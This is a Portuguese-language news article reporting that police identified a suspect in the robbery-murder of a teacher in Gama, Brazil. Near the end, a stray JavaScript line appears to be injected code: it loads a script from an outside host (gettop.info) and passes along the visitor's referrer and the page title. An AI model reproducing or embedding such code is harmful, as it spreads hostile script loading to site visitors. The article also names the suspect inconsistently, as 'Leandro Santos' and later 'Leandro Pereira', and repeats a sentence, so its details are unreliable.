Polícia Civil identifica suspeito de matar professora no Gama

O homem suspeito de matar a professora Raquel Costa Miranda foi identificado pela Polícia Civil na manhã desta quinta-feira (5). Há indícios de que a professora tenha sido baleada por Leandro Santos, conhecido como “Canudo”. Ele tem várias passagens pela polícia por roubo de carro e cargas.

O comparsa do suspeito, que estava com o celular da vítima, serviu de isca para identificar o autor do latrocínio. Leandro está sendo procurado em uma cidade de Goiás, no Entorno do DF e é considerado, pelas autoridades, foragido. 

Carro de Raquel que foi encontrado queimado no Novo Gama (GO)

Raquel foi morta ao ver um homem mexendo em seu veículo, um Fiat Uno quando saía do Posto de Saúde 5, no Setor Central do Gama. O criminoso aproximou-se da vítima, atirou, pegou a chave do automóvel e fugiu do local. O carro foi encontrado queimado no Novo Gama (GO).

Baleada nas costas e ainda com vida, a professora foi socorrida, mas não resistiu aos ferimentos e morreu no hospital. O corpo dela será velado a partir das 11h no Cemitério do Gama. O enterro está previsto 15h30. Baleada nas costas, a professora ainda foi socorrida com vida, mas não resistiu ao ferimento e morreu no hospital

A professora, ministrava aulas de português em uma escola do Recanto das Emas. Deixa marido e dois filhos, um adolescente de 17 anos e a caçula. Emocionada, uma prima, que não quis se identificar, disse que o marido e a mãe da professora estão muito abalados com a tragédia.

Informações a respeito do paradeiro do autor podem ser repassadas à polícia pelo telefone 197.

Suspeito de matar a professora, Leandro Pereira, 24 anos, conhecido como “Canudo”. Foto: reprodução – Polícia Civil.
 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário